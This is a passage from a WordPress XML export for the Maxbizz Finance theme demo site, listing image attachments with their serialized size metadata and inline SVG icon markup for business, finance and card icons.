		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/coming-soon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1080;s:4:"file";s:25:"2020/09/coming-soon.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"coming-soon-1-300x169.jpg";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"coming-soon-1-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"coming-soon-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"coming-soon-1-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"coming-soon-1-1536x864.jpg";s:5:"width";i:1536;s:6:"height";i:864;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"coming-soon-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"coming-soon-1-1200x1080.jpg";s:5:"width";i:1200;s:6:"height";i:1080;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/pheader-elements/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>625</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-elements]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-elements.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:30:"2020/09/pheader-elements.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"pheader-elements-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"pheader-elements-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"pheader-elements-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"pheader-elements-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"pheader-elements-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-elements-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-elements-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"pheader-elements-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"pheader-elements-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>interface</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/interface/</link>
		<pubDate>Wed, 09 Sep 2020 07:02:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/interface.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>629</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:02:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:02:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[interface]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/interface.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/interface.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/business-and-finance/</link>
		<pubDate>Wed, 09 Sep 2020 07:06:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>631</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:06:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:06:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/business-and-finance-1/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>637</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/business-and-finance-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>card</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/card/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/card.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>638</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[card]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/card.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/card.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 